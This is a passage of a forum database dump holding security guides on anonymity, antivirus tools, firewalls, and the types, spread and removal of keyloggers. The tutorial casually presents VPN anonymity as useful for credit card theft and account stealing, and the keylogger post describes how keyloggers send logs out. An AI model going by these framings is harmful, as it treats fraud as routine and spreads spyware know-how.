it’s strongly advised to remain as secret as possible. This can be done in a number of ways, though the most obvious is providing incorrect personal information. If being targeted by any Black Hat Hacker, most people are at a great risk of being exploited because they have private information show publically online. To ‘dox’ someone means to find out as much personal information as possible. In the hacking world, this form of discovery is used to seek out an appropriate target. Obviously, not being able to be ‘doxed’ is extremely important to remain anonymous. Being secure and unknown is the best way to operate online if you’re serious about security. Having personal details such as your name, age, phone number, address, e-mail address available to public figures who, to your knowledge, could be anyone, is not a safe way to operate. When signing up for forums, services, and other online aptitudes, it’s advised to provide as much incorrect information as possible to remain anonymous.[hr]\r\n[align=center][size=medium][b][color=#00BFFF]Section 2[/color][/b][/size][/align]\r\n\r\n[u]5.0 Infectious Software Treatment[/u]\r\n\r\nFalling slave to malware infection is normal, and it’s very difficult to completely protect yourself. The fact is, sooner or later, you’re highly likely to become infected. Obviously prevention is the key, but seeking the right treatment for an infection is vital. There is a lot of software which aims at protection and prevention, yet sadly there isn’t a lot when it comes to cure. Many antivirus programs have the ability to quarantine suspicious files, which is imperative for quick removal. Another method of seeking out problems is implementing the ‘HiJackThis’ service.\r\n\r\n[u]4.1 Antivirus Quarantine[/u]\r\n\r\nMost antivirus softwares have the ability to [i]quarantine[/i] suspicious files. Having antivirus software is, possibly, the most mandatory tool to any hacker. Good quality antivirus programs have capability to detect malicious programs when you come in contact with them. This is rather effective and helps prevent much potential destruction.\r\n\r\n[u]4.2 HiJackThis[/u]\r\n\r\nHiJackThis is an online service based upon gathering logs of your system’s functionality. A HiJackThis log is a depiction of your system’s output and, when analysed correctly, can be an extremely useful tool to seek out the problem, and in tern, patch the problem. I’ll go into more detail on the HiJackThis service later on.\r\n\r\n[u]5.0 Preventing Infection[/u]\r\n\r\nPreventing infection is critical for the maintenance of your machine. Not only that, but it makes your overall computing experience much more gratifying.\r\n\r\n[u]6.0 Prevention of Infection Tools[/u]\r\n\r\nThis section will justify some of the essential tools often used to prevent infection. Having competent software is extremely important to the survival of your system. One cannot prevent being infected without the aid of a few basic tools, which is why I’ve detailed some of the basic software regularly used to prevent your system from being compromised.\r\n\r\n[u]6.1 HiJackThis[/u]\r\n\r\nAs mentioned above, the HiJackThis resource is one of the most important services freely available online to diagnose infected systems. Analysing HiJackThis logs, does however take a lot of time and if incorrectly scrutinized, can cause much harm to a computer system. This is why, it’s advised that you seek the help of a trained HiJackThis analyst before attempting anything yourself.\r\n\r\n[b]Availability[/b]\r\n\r\n[url=http://hijackthis.com]The HiJackThis Website[/url]\r\n\r\n[u]6.2 Application Isolation Software[/u]\r\n\r\nApplication isolation software is software used to safely test suspicious applications in the safety of an isolated provision. An example might be, you’ve just downloaded a file that your friend said was a really cool game. You know this person often tries to infect people with various exploits such as Remote Administration Tools, so you don’t want to take any chances. The best thing to do in this scenario would be to use application isolation software. This’ll allow you to see if it really is a game, or if it has other intentions.\r\n\r\n[u]6.2.1 Sandboxie[/u]\r\n\r\nThough there is other application isolation software available, Sandboxie is regarded as one of the more efficient tools. It’s designed to provide a safe environment for you to test any suspicious files in.\r\n\r\n[b]Availability[/b]\r\n\r\n[url=http://Sandboxie.com]The Sandboxie Website[/url]\r\n\r\n[u]6.3 VPN Software[/u]\r\n\r\nVPN software, or a Virtual Private Network, is a tool used to remain anonymous online. The importance of remaining undetectable was stressed above, which is why I’ve justified some leading VPN tools. A VPN assigns you an IP address from the VPN server itself. This means, you’re able to browse the Internet through a third-party IP address. This is useful for bypassing blocked websites and enhancing your anonymity when undergoing dangerous operations such as credit card thievery or account stealing.\r\n\r\n[u]6.3.1 Hotspot Shield[/u]\r\n\r\nHotspot Shield is widely known as one of the leading VPN softwares. Hotspot Shield offers complete protection and anonymity when operating online. Hotspot Shield is extremely efficient and boasts a wide range of features including the capability to store your personal details securely, a fully functional antivirus feature, and compatibility on all Windows and Macintosh platforms.\r\n\r\n[b]Availability[/b]\r\n\r\n[url=http://hotspotshield.com]The Hotspot Shield Website[/url]\r\n\r\n[u]6.3.2 Tor[/u]\r\n\r\nTor, much similar to Hotspot Shield, is another well-known VPN service. You’re assigned an IP address from a distributed network of relays located all over the world. Tor works for a variety of Internet facilities such as instant messaging services, web browsers, and many more applications.\r\n\r\n[b]Availability[/b]\r\n\r\n[url=http://www.torproject.org]The Tor Website[/url]\r\n\r\n[u]6.3.3 Loki[/u]\r\n\r\nAnother VPN that is, arguably, in the top five VPN programs, is Loki. It offers all round efficiency with complete protection of personal details such as your IP address, FTP details, Internet passwords, browser history, and much more.\r\n\r\n[b]Availability[/b]\r\n\r\n[url=http://www.projectloki.com]The Loki Website[/url]\r\n\r\n[u]6.4 Online Proxies[/u]\r\n\r\nSimilar to VPN services, proxies allows you to browse the Internet anonymously. They have the capability to circumvent implemented blocks at your location. Not only that, but a proxy can provide you with excellent security measures to help hide your online identity. Though proxies aren’t as powerful or as feature loaded as a VPN, they’re still an excellent alternative and allow for immediate web access.\r\n\r\n[u]8.4.1 HideMyAss[/u]\r\n\r\nHideMyAss is considered to be one of the top online proxies. It’s extremely efficient, and allows you to begin browsing immediately.\r\n\r\n[b]Availability[/b]\r\n\r\n[url=http://hidemyass.com]The HideMyAss Website[/url]\r\n\r\n[u]6.5 Antiviruses[/u]\r\n\r\nAn antivirus program is perhaps the most important software one can have. Quality antiviruses provide almost complete protection ranging from website security, through to malware detection. If you’re a serious hacker or computing enthusiast, or would like to be, having an antivirus program is essential for prolonging the dynamism of your machine.\r\n\r\n[u]6.5.1 ESET NOD32[/u]\r\n\r\nESET NOD32 antivirus is one of the better antivirus programs around. It regularly updates several times a day to the latest virus signature database and in tern, providing optimum protection. The ESET NOD32 antivirus provides online protection and also downloads protection. Simple, yet effective, the ESET NOD32 antivirus is indefinitely, extremely efficient software.\r\n\r\n[b]Availability[/b]\r\n\r\n[url=http://eset.com]The ESET Website[/url]\r\n\r\n[u]6.5.2 AVG[/u]\r\n\r\nAVG is one of the paramount antivirus softwares, with excellent protection. With a collection of unique features, AVG is definitely an antivirus to consider. It provides a Home Security version, and also a Business Security version. With features ranging from Link Scanner technology, through to Spam and Phisher prevention, AVG is categorically excellent software.\r\n\r\n[b]Availability[/b]\r\n[url=http://avg.com]The AVG Website[/url]\r\n\r\n[u]6.5.3 Avast[/u]\r\n\r\nAlso considered to be in the top five antivirus programs, Avast offers complete protection and Internet security. Features such as Anti-rootkit and Anti-spyware capabilities, are reasons why Avast has had so much good feedback. With daily updates and resident shield technology, Avast is unarguably, one of the best antivirus programs available.\r\n\r\n[b]Availability[/b]\r\n\r\n[url=http://avast.com]The Avast Website[/url]\r\n\r\n[u]6.5.4 BitDefender[/u]\r\n\r\nWith features ranging from real-time instant messaging and e-mail scanner technology, BitDefender is deemed to be one of the preeminent antivirus softwares. With a range of different versions, BitDefender has a package that’s right for you. Offering encryption services, BitDefender is hard to go past.\r\n\r\n[b]Availability[/b]\r\n\r\n[url=http://bitdefender.com]The BitDefender Website[/url]\r\n\r\n[u]6.5.5 Kaspersky[/u]\r\n\r\nDefinitely one of the top five antivirus programs, Kaspersky is hard to surpass. Offering a wide range of versions from Home and Office to Business protection, Kaspersky has the flexibility to meet your personal needs. Another helpful feature that Kaspersky provides is Online Courses which are designed to teach about the way the Kaspersky Lab products work and how to implement them most efficiently. With colour-coding of unsafe links, Kaspersky Anti-Virus provides an adaptable interface suited to your personal needs.\r\n\r\n[b]Availability[/b]\r\n\r\n[url=http://Kaspersky.com]The Kaspersky Website[/url]\r\n\r\n[u]6.6 Firewalls[/u]\r\n\r\nA firewall is a basically a virtual wall that protects remote users from attacking your system. The main purpose is to prevent unwanted traffic that can be used to slow or danger your machine. Denial of Service attacks, sniffing, and network penetration can all be accounted for with the use of a simple firewall.\r\n\r\n[u]6.6.1 Windows Firewall[/u]\r\n\r\nThe Windows Firewall is a built-in, host-based firewall included in Windows Vista and Windows XP (with Service Pack 2 and onwards). It offers well-rounded support and protection from any remote systems. Because the Windows Firewall is built-in software, commonsense would tell you that it isn’t compatible with Macintosh and Linux platforms.\r\n\r\n[b]Availability[/b]\r\n\r\nFor Windows XP Users Without Service Pack 2 or Higher – [url=http://www.microsoft.com/downloads/details.aspx?FamilyID=4454e0e1-61fa-447a-bdcd-499f73a637d1&displaylang=en]The Microsoft Website[/url]\r\n\r\n[u]7.0 Conclusion[/u]\r\n\r\nThroughout this tutorial, the importance of preventing infection has been stressed through numerous ways. Remaining anonymous when online is one of the paramount focuses when undergoing online activity. So too, is inferring the potential threats a suspicious file may contain. Should you implement the above strategies and techniques, you’ve got a higher chance of preventing infection from occurring. Analysing and curing infections through the likes of the HiJackThis service and antivirus software are also important characteristic of a security alert user. The implementation of security tools is extremely important and is vital to the long life and efficiency of your system.', '41.174.16.25', '699273241', '0', '0', '0', '0', '1', 'b5225b3234cd17fc293d749e241bf049', '0', '0'); INSERT INTO mybb_posts VALUES('148', '62', '0', '25', '[Guide]Firewalls', '0', '8', 'spacefish36', '1343947517', 'Table of Contents:\r\n[list][*]Basic information on firewalls\r\n[*]Types of firewalls\r\n[*]List of firewalls & information\r\n[*]Firewall tests\r\n[*]Credits\r\n[/list]\r\n\r\n[b][color=green][u]Section 1: Basic information on firewalls[/u][/color][/b]\r\nFirewalls play a central role in securing a PC, standing as a filter between the outside world and your computer. While there are several types of firewalls, the technology can be broadly defined as a collection of related security programs that are stored on a network gateway server and collectively safeguard network assets from users on other networks. \r\n\r\nWhile all firewalls run software, the firewall market is generally divided into these two categories: hardware and software. For the sake of this guide, I will only focus on the software firewalls.\r\n\r\nIn its most basic form, a firewall basically filters incoming and outgoing packets. This means a firewall accepts or denies the connections based on user-defined rules. Firewalls are also used to monitor traffic from applications installed on your system, and based on the user defined rules, the traffic will either be allowed through or blocked. \r\n\r\nWith these features, a firewall can be very useful in stopping hackers or malware in its tracks before anything malicious can happen. For example, a firewall can prevent connections from an outside hacker getting in, or it can deny outbound traffic of a trojan downloader trying to download malicious files. \r\n\r\n[b][color=green][u]Section 2: Types of firewalls[/u][/color][/b]\r\nThere are a few different types of firewalls, but nowadays, most firewalls include all these features.\r\n\r\n[b]Packet-Filtering Firewalls[/b]: In its most basic form, a firewall does nothing but filter packets. This means that the firewall accepts or rejects IP packets on the basis of predefined rules. With packet filtering, the firewall carefully scrutinizes each packet\'s protocol and address information; content and context data are not considered. The main advantages of packet-filtering firewalls are their relative simplicity, low cost, and fast and easy deployment attributes. Software-only firewalls for home and small business are typically of this variety, including the firewall that is built in to more recent versions of Windows.\r\n\r\n[b]Circuit-Level Firewalls[/b]: This type of firewall doesn\'t simply accept or reject packets, it also decides whether a connection is valid according to a set of configurable rules. If everything checks out, the firewall opens a session and allows traffic to flow in only from the authenticated source. The traffic may also be permitted to proceed for only a limited period of time. In addition, the firewall may perform connection validation on the source IP address and/or port, the destination IP address and/or port, the protocol used, user IDs, passwords, the time of day or, most likely, several of these conditions. In addition, packet-level filtering may also take place. \r\n\r\nThe big drawback to circuit-level firewalls is that they function at the transport layer and therefore may necessitate a significant modification of the transport-function programming. This can impact the performance or operation of a network. Also, circuit-level firewalls require more expertise to install and maintain.\r\n\r\n[b]Application-Level Firewalls[/b]: With this approach, the firewall acts as an application proxy, supplying all data exchanges with the remote system. The idea behind this concept is to make the server behind the firewall invisible to the remote system.\r\n\r\nAn application-level firewall can accept or reject traffic based on a specific set of rules. The firewall may, for example, allow some commands to proceed to a server while rejecting others. The technology can also be used to restrict access to specified file types, as well as to provide different access levels to authenticated and nonauthenticated users. Application-level firewalls tend to be preferred by users who require detailed traffic monitoring and logging on the host, since the addition of these activities is relatively simple and doesn\'t further impact performance. IT administrators can set an application-level firewall to trigger alarms and notifications in the event that a predefined condition occurs. Application gateways are typically deployed on a separate network-connected computer, commonly called a proxy server\r\n\r\n[b]Stateful Multilevel Firewalls[/b]: Typically offered by vendors as \"best-of-breed\" solutions, this approach aims to combine the best attributes of multiple firewall types. Stateful multilevel firewalls are designed to perform network-level packet filtering while recognizing and processing application-level data. These firewalls often provide superior network protection but can be very expensive.\r\n\r\n[b][color=green][u]Section 3: List of firewalls & information[/u][/color][/b]\r\nThere are several leading firewalls out there, but I\'ve compiled a list of the most commonly used ones here. Do note that these are standalone firewalls; I will not talk about the firewalls that come with security suites (eg. Kaspersky Internet Security comes with its own firewall; I will not talk about it here).\r\n\r\n[b]ZoneAlarm[/b]:\r\n[i]Quoted from CNET - ZoneAlarm is designed to protect your DSL- or cable-connected PC from hackers. This program includes four interlocking security services: a firewall, an application control, an Internet lock, and Zones. The firewall controls the door to your computer and allows only traffic you understand and initiate. The Internet lock blocks Internet traffic while your computer is unattended or while you\'re not using the Internet, and it can be activated automatically with your computer\'s screensaver or after a set period of inactivity. Zones monitor all activity on your computer and alert you when a new application attempts to access the Internet.\r\n\r\nVersion 8.0.298 is Vista 64-bit compatible, improves performance during computer startup, shutdown and operation. [/i]\r\n\r\nZoneAlarm is generally for users that are not computer savvy. It has many features, including a multilayered firewall, antivirus monitoring, application monitoring, and event logging.\r\n\r\nDownload link: [url=http://www.zonealarm.com/security/en-us/anti-virus-spyware-free-download.htm]ZoneAlarm Free[/url]\r\n\r\nScreenshot: \r\n[img]http://images.snapfiles.com/screenfiles/zonealarm.gif[/img]\r\n[b]\r\nOnline Armor[/b]:\r\n[i]Quoted from CNET - Online Armor Personal Firewall--Easy to use, award winning firewall. Online Armor is a powerful personal firewall, with HIPS and a host of other security features to keep your PC clear of infections and running smoothly. Online Armor is designed to be easy to use for beginners and offers powerful performance.[/i]\r\n\r\nOnline Armor can generally be used by computer users of all levels. It is also considered as a HIPS program.\r\n\r\nDownload link: [url=www.tallemu.com]Online Armor Personal Edition[/url]\r\n\r\nScreenshot:\r\n[img]http://images.betanews.com/screenshots/1124210905-1.jpg[/img]\r\n\r\n[b]Comodo Firewall[/b]:\r\n[i]Quoted from CNET - Comodo Firewall Pro is aimed to secure your system against internal attacks such as Trojan viruses / malicious software and external attacks by hackers. Safeguard your personal data through a simple user friendly single click interface offering full immunity to attack. Comodo Firewall Pro helps you connect in a secure way to the internet and global networks.[/i]\r\n\r\nComodo Firewall has several more features, and is recommended for a computer savvy user who wants to fully customize his firewall rules and settings. It includes an antivirus, although it is not relied on as sole protection. An antivirus should be used with it.\r\n\r\nVersion 3.9.76924.507 has stateful File Inspection for Realtime Virus Scanner and livePCSupport is provided as a 30 Day Trial. \r\n\r\nDownload link: [url=www.personalfirewall.comodo.com]Comodo Firewall Pro[/url]\r\n\r\nScreenshot: \r\n[img]http://pcwin.com/media/images/screen/73890-comodo_firewall_pro.gif[/img]\r\n\r\n[b][color=green][u]Section 4: Firewall tests[/u][/color][/b]\r\nNow, if you want to test how secure your firewall is, there are a few sites offering firewall tests.\r\n\r\n[url=http://www.pcflank.com/]PC Flank tests[/url]\r\n[url=https://www.grc.com/x/ne.dll?bh0bkyd2]GRC - Shields Up![/url]\r\n[url=http://www.hackerwatch.org/probe/]McAfee - Test your firewall[/url]\r\n\r\nThese are just basic tests for your firewall.\r\n\r\n[b][color=green][u]Credits[/u][/color][/b]\r\nCredits for the guide go to ITsecurity, myself, and Google of course :oui:\r\n\r\nI hope this helps. Safe surfing.', '41.174.16.25', '699273241', '0', '0', '0', '0', '1', '94990389899e0281438face9593aa2a2', '0', '0'); INSERT INTO mybb_posts VALUES('149', '63', '0', '23', '[Guide] - Keylogger Information & Removal - [Guide]', '0', '12', 'jonas83', '1343948019', 'I should write up a tutorial on keyloggers and how to get rid of them as they are a popular tool for script kiddies that like to infect people and steal their passwords.\r\n\r\n[color=#FFD700][b]Notes:[/b][/color] \r\nI don\'t want to use quote boxes because I personally don\'t like reading off them. :tongue:\r\n\r\n[color=#32CD32][size=medium][b].::What is a keylogger::.[/b][/size][/color]\r\n\r\nQuoting Wikipedia:\r\n[b]Keystroke logging[/b] (often called [b]keylogging[/b]) is the practice of tracking (or logging) the keys struck on a keyboard, typically in a covert manner so that the person using the keyboard is unaware that their actions are being monitored. There are numerous keylogging methods, ranging from hardware and software-based to electromagnetic and acoustic analysis.\r\n\r\nThese are software programs designed to work on the target computer’s operating system. From a technical perspective there are five categories:\r\n[list] [*] [b]Hypervisor-based:[/b] The keylogger can theoretically reside in a malware hypervisor running underneath the operating system, which remains untouched. It effectively becomes a virtual machine. Blue Pill is a conceptual example.\r\n [*] [b]Kernel based:[/b] This method is difficult both to write and to combat. Such keyloggers reside at the kernel level and are thus difficult to detect, especially for user-mode applications. They are frequently implemented as rootkits that subvert the operating system kernel and gain unauthorized access to the hardware, making them very powerful. A keylogger using this method can act as a keyboard driver for example, and thus gain access to any information typed on the keyboard as it goes to the operating system.\r\n [*] [b]Hook based:[/b] Such keyloggers hook the keyboard using functionality provided by the operating system for applications to subscribe to keyboard events legitimately. The operating system notifies the keylogger each time a key is pressed and the keylogger simply records it.\r\n [*] [b]Passive Methods:[/b] Here the coder uses operating system APIs like GetAsyncKeyState(), GetForegroundWindow(), etc. to poll the state of the keyboard or to subscribe to keyboard events. These are the easiest to write, but where constant polling of each key is required, they can cause a noticeable increase in CPU usage and can miss the occasional key. An example would be found in Soul Collector\'s basic keylogger in Visual Basic tutorial. A more recent example simply polls the BIOS for preboot authentication PINs that have not been cleared from memory.\r\n [*] [b]Form Grabber based:[/b] Form Grabber-based keyloggers log web form submissions by recording the web browsing onSubmit event functions. This records form data before it is passed over the internet and bypasses https encryption.[/list]\r\n[color=#FFD700][b]Remote access software keyloggers[/b][/color]\r\n\r\nThese are local software keyloggers programmed with an added feature to transmit recorded data from the target computer to a monitor at a remote location. Remote communication is facilitated by one of four methods:[list][*] Data is uploaded to a website, database or an FTP account.\r\n [*] Data is periodically emailed to a pre-defined email address.\r\n [*] Data is wirelessly transmitted by means of an attached hardware system.\r\n [*] The software enabling a remote monitor to log into the local machine via the internet or ethernet and access the logs stored on the target machine.[/list]\r\n\r\n[b]Wikipedia link: [/b]\r\nhttp://en.wikipedia.org/wiki/Keystroke_logging\r\n[b]\r\nA small guide on Keyloggers:[/b]\r\nhttp://www.actualspy.com/articles/keyloggers.html\r\n\r\n[color=#32CD32][size=medium][b].::How people spread keyloggers / How you may get infected by one::.[/b][/size][/color]\r\n[b]\r\nComplete Windows Trojan Paper:[/b]\r\nhttp://www.infosecwriters.com/texts.php?op=display&id=58\r\n[i]Please jump to the \'[b]How Can I Get Infected?[/b]\' section[/i]\r\n\r\nMost common methods on how a person can get infected by a keylogger are:\r\n\r\n- [b]Via Attachments:[/b]\r\nI\'m always amazed how many people got themselves infected by an attachment, sent into their mailboxes. Most of these users are new to the Internet and are pretty naive. When they receive a mail,containing an attachment, saying they will get free p0rn, free Internet access etc., they run it without completely understanding the risks for their machines. Check the following scenario: you know your friend Alex is a very skilled Visual Basic programmer. You also know he\'s coding his latest program but you\'re curious what it is all about, and you wait for an e-mail from him with the attachment when he finishes coding the application. Yeah, but the person targeting YOU also knows that. The attacker also knows your friend\'s e-mail address. Then the attacker will simply code some program or get some freeware one, use some relaying mail server to fake the e-mail\'s FROM field and make it look like your friend\'s one; Alex\'s e-mail address is alex@example.com so the attacker\'s FROM field will be changed to alex@example.com and, of course, it will include the TROJANED attachment... You\'ll check your mail, see that Alex finally got his program ready and sent it, you\'ll download and run it without thinking that it might be a trojan or something else, because, hey, Alex wouldn\'t do something like that to me, he\'s my friend, and you\'ll get yourself infected.\r\n\r\nInformation Is Power! Just because the attacker knew you were waiting for some particular file, he found Alex\'s e-mail address and got you infected... the right moment assumes importance here. And it all happened just because you were naive, just because you saw alex@example.com in the FROM field, and just because you didn\'t check the mail headers to see that the mail came from some .jp mail server relaying e-mails and, has been used from spammers for several months.\r\n\r\nMany people got themselves infected by the famous \"Microsoft Internet Explorer Update\" sent directly to their mailboxes, by the nonexistent Microsoft Updates Staff. I understand you felt great because Microsoft are paying attention especially to you, and sent you the latest updates, but these \"updates\" are definitely trojans. Microsoft will NEVER send you updates of their software via e-mail no matter you see the FROM field is updates@microsoft.com and as you\'ve noticed in the previous example the FROM field could and IS faked. If you ever notice some mail in your mailbox with subjects like \"Microsoft IE Update\" and such, delete WITHOUT viewing or reading the e-mail, because some E-Mail clients like Outlook Express and others, have bugs that automatically execute the file being attached in the e-mail WITHOUT you even touching it. As you can imagine this is a extremely dangerous problem that requires you to be always up to date with the latest version of any software you\'re using.\r\n\r\n- [b]Physical Access[/b]\r\nPhysical access is vital for your computer\'s security. Imagine what can an attacker do while having physical access on your machine, and let\'s not mention if you\'re always connected to the Internet and leave the room for several minutes... long enough to get you infected. Here I\'ll point you several scenarios, often used by attackers to infect your computer while they\'re having physical access to your machine. There are some very smart people out there that keep thinking of new ways of getting physical access to someone\'s computer. Here are some tricks that are interesting:\r\n[list] [*] Your \"friend\" wants to infect you with a trojan and he/she has physical access to your machine. Let\'s say you were at home surfing the net, chatting or whatever. Suddenly your \"friend\" asks you for a glass of water, knowing that you\'ll go in another room and will be away for 1 or 2 minutes. While you do that he/she takes out a diskette of the pocket and infects your unprotected PC. You came back and everything is OK because your \"friend\" is doing exactly the same thing before you left ...surfing the net.[/list] [list] [*] The next example is when 2 guys want to take revenge on you cause of something and are supporting each other to accomplish the task. Again you are at home with your \"friend\", surfing, chatting, whatever you\'re doing; suddenly the telephone rings and a \"friend\" of yours wants to speak with you for something that is really important. He/she (it\'s better to be she in this case) asks \"Is there anyone around you? If so,please move somewhere away from him/her(after knowing it is him or her,of course). I don\'t want anyone to listen what I\'m going to tell you\". The slave is again lured away from the computer, leaving the attacker to do whatever he/she wants on the target computer.[/list] [list] [*] Other approaches like the previous ones might be sudden ring on the bell, as well as other variations of phone calls and conversations leaving the attacker alone with the slave\'s computer. There are so many other possible approaches; just think for a while and you\'ll see what I mean and how easily you could be tricked, and it\'s because you\'re not suspicious enough when it is about your sensitive computer data.[/list]\r\n\r\n- [b]Fake Programs[/b]\r\nIt is surprising a lot of people fall for fake programs. Fake programs can be of all sorts. [list] [*] Key-gens [*] Web Messengers [*] Cracks [*] Installation files for games [*] Almost everything with a \'.exe\' extension can be a fake program. [/list]\r\nFake programs aren\'t the actual logger, the logger server may be binded with the fake program using binders, found around the web for free. Fake programs are dangerous as merely running them will automatically execute the program it is binded with. So, to know if what you downloaded is a fake program, check for the following:\r\n[list][*]Is the vendor trusted? [*]Are there any positive comments and feedback by downloaders (note: the person posting might have acquaintances ready to post fake replies.) [*]Check for a few negative feedback (if any) to understand if the program works or not. [*]Are there any screenshots provided? Screenshots are very useful to detect a programs believability. If the screenshot looks legitimate, the program MIGHT be trusted (many people make their fake programs believable and attractive nowadays) [*]Virus scans. Note if there are any virus scans present. Virus scans can be faked, so it is recommended that you scan yourself in VirusTotal.[/list]\r\nIf you don\'t trust a program, run it on VMware or Sandboxie.\r\n\r\n[b]VMware:[/b] (Recommended)\r\nhttp://www.vmware.com/\r\n[b]\r\nSandboxie:[/b] (note, some keyloggers are coded to bypass sandboxie to infect your system. It is recommended to use VMWare.)\r\nhttp://www.sandboxie.com/\r\n\r\nIf you see a fake program posted here, report it.\r\n\r\n\r\n[color=#32CD32][size=medium][b].::Symptoms of keylogger\'s presence::.[/b][/size][/color]\r\n\r\nThere can be various types of symptoms of a keylogger infection. Sometimes not all of these are noticed. It all depends on the type of keyloggers used.\r\n\r\nHere are some symptoms that might occur (please suggest more via replies to keep the symptoms updated.):[list]\r\n[*]You try to log into your e-mail/facebook account and see the \"Invalid Password\" error. You try to enter your password multiple times, but no success\r\n[*]Your friends mention that they have received messages from your address which you know you did not send.\r\n[*]Some keyloggers (mostly the keyloggers found here) contain an anti\'s function, meaning that it will kill your anti-virus process upon execution. So, you might notice your anti-virus software not working properly.\r\n[b]NOTE:[/b] Some keyloggers add themselves to startup, therefore they execute on startup and only kill the AV process during startup. This is good for us as we can run the AV again after startup. This is only true for poorly coded or poorly tested keyloggers. Advanced keyloggers kill the AV process when the AV is run.\r\n[*]You receive notification from your firewall that some applications have attempted to connect to the Internet, although you did not initiate this. This could be a keylogger trying to send information to it\'s master/spreader/creator.\r\n[*]Unknown processes in [b]Task Manager.[/b]\r\n[*][i]Unhandled Exception[/i] errors. (Visual Basic Keyloggers) [/list]\r\nThese symptoms usually mean a keylogger infection. Might also mean a trojan infection, but I won\'t go into that. Look into Valiant\'s guide on trojans for more information on trojans.\r\n\r\n\r\n[color=#32CD32][size=medium][b].::If infected::.[/b][/size][/color]\r\n\r\nIf you seem to notice the symptoms listed above and think you are infected by a keylogger, do not panic. Panicking will lead to amateur actions which might damage your security further. Follow the steps provided.\r\n\r\n[b]Disconnect you infected computer from the Internet.[/b]\r\nKeyloggers usually send information via the Internet using e-mails and FTP uploading. Therefore disconnecting the computer from the Internet will secure the accounts you haven\'t yet lost. \r\nNOTE: All downloads of anti-spywares and anti-keyloggers must be done in another computer. A spare PC, school computer, office computer, friends computer, Local Internet Cafe, etc. should be used to download the softwares necessary for the removal of your infection. \r\n\r\n[b]Recovering you accounts:[/b]\r\nThe accounts you have lost can be recovered using the recovery question or \'Forgot my password\' page. Please recover your accounts using spare PC, school computer, office computer, friends computer, Local Internet Cafe, etc. NOT the infected computer.\r\n\r\n[b]Anti-Keyloggers:[/b]\r\n\r\nI would recommend using an anti-keylogger, if you decide not to keep your computer disconnected from the internet.\r\n\r\nDownload [url=http://download.cnet.com/KeyScrambler-Personal/3000-2144_4-10571274.html][color=#00BFFF][b]KeyScrambler Personal[/b][/color][/url]:\r\n\r\n[color=#FFD700]KeyScrambler Personal is a free plug-in for your Web browser that protects everything you type from keyloggers. It defeats keyloggers by encrypting your keystrokes at the keyboard driver level, deep within the operating system. When the encrypted keystrokes reach your browser, KeyScrambler then decrypts them so you see exactly the keys you\'ve typed. Keyloggers can only record the encrypted keys, which are completely indecipherable. Unlike anti-virus and anti-spyware programs that depend on recognition to remove keyloggers that they know about, KeyScrambler will protect you from both known and unknown keyloggers. What\'s more, KeyScrambler provides protection without getting in your way. You don\'t have anything to learn about the program and you don\'t have to do anything differently, but with KeyScrambler your important personal information will be a whole lot safer.[/color]\r\n\r\nBasically it is a software that encrypts your keystrokes so that the logs of a keylogger would be unreadable.\r\n\r\n[color=#32CD32][b].::Removing the infections::.[/b][/color]\r\n\r\n\r\nA good antispyware software should detect the infection. Therefore, perform the following:\r\n\r\n[spoiler][color=#00BFFF][u][b]MalwareBytes Anti-Malware[/b][/u][/color]\r\n[list]\r\n[*][url=http://www.malwarebytes.org/mbam.php][color=#FFA500][b]Download Malwarebytes\' Anti-Malware[/b][/color][/url] - Please use this link to avoid downloading incorrect and potentially harmful software.\r\n[/list]\r\n[color=#FFA500][b]Please execute the following instructions:[/b][/color]\r\n[list]\r\n[*]Double-click the \'[b]mbam-setup.exe[/b]\' file to install this application.\r\n[*]Ensure a check mark is placed in the radio box next to \'[b]Update Malwarebytes\' Anti-Malware[/b]\' and please also make sure that there is a check mark in the radio box next to \'[b]Launch Malwarebytes\' Anti-Malware[/b]\'\r\n[*]Click \'[b]Finish[/b]\'\r\n[list][*][i][u]Note[/u]: If an update is found, it will download and install the latest version. Please do not interrupt this process.[/i][/list]\r\n[*]Once the program has loaded, please ensure a check mark is placed in the radio box next to \'[b]Perform Full Scan[/b]\' (not Perform Quick Scan) and proceed by clicking on \'[b]Scan[/b]\'.\r\n[list][*][i][u]Note[/u]: The scan may take some time, so please be patient and wait for it to finish. [b] Please stop all current downloads while your scan is in progress, as this may corrupt the results.[/b][/i][/list]\r\n[*]When the scan is complete, click \'[b]OK[/b]\' and then click \'[b]Show Results[/b]\' to view the results.\r\n[*]Make sure that everything is checked, and proceed by clicking \'[b]Remove Selected[/b]\'\r\n[*]Once disinfection is completed, a log will open in Notepad and you may be prompted to restart your machine. If you are asked to restart, please do so.\r\n[list][*][i][u]Note[/u]: The log is automatically saved by Malwarebytes\' Anti-Malware and can be viewed by clicking on the \'[b]Logs[/b]\' tab in the main interface.[/i][/list]\r\n[/list][/spoiler]\r\n\r\n[spoiler][color=#00BFFF][u][b]SUPERAntiSpyware[/b][/u][/color]\r\nI\'d like to recommend that you download an application known as [url=http://www.superantispyware.com/downloadfile.html?productid=SUPERANTISPYWAREFREE][color=#1E90FF][b]SUPERAntiSpyware[/b][/color][/url]. We use this tool to test for any spyware that may be present on your machine. Details on how to operate this application are given below.\r\n\r\n[color=#FFA500][b]Please execute the following instructions:[/b][/color]\r\n[list]\r\n[*][b][url=http://www.superantispyware.com/downloadfile.html?productid=SUPERANTISPYWAREFREE][color=#1E90FF]Download SUPERAntiSpyware[/color][/url][/b] - Please use this link and this link only. This is advised as it limits the chances of you downloading incorrect and potentially harmful software.\r\n[*]Run the installer (SUPERAntiSpyware Free Edition Setup).\r\n[*]SUPERAntiSpyware will ask you if you would like to check for the latest rules and definition updates. Select \'[b]Yes[/b]\'.\r\n[*]You will now be presented with the SUPERAntiSpyware Setup Wizard. Follow the prompts (by pressing Next).\r\n[list][*]In one of the steps, it\'ll ask you if you\'d like to send a Diagostic Report to the SUPERAntiSpyware research center. If you opt to do this, it will take up to five minutes before you can proceed with the setup. This is not a necessary step, though it\'s recommended, as it will help with the worldwide anti-malware command.\r\n[/list][*]Once you\'ve finished with the Setup process, the SUPERAntiSpyware interface will open.\r\n[*]Please choose the \'[b]Check for Updates...[/b]\' option.\r\n[*]Once this process has completed, please select the \'[b]Scan your Computer...[/b]\' option.\r\n[*]Ensure that [b]all the drives are checked[/b] and then proceed by checking the \'[b]Perform Complete Scan[/b]\' option. Press Next.\r\n[*]SUPERAntiSpyware will begin scanning your system for spyware. It\'s important that you allow it to do this without any interruptions.\r\n[list][*]Please make sure that you don\'t install any new applications whilst the scan is in process.[/list]\r\n[*]Once the scan has completed, you\'ll be presented with an interface detailing what the scan has found. Press \'[b]Okay[/b]\' and on the main interface ensure that any threats have been checked. Continue by pressing \'[b]Next[/b]\'.\r\n[*]The threats will now be quarantined. Press 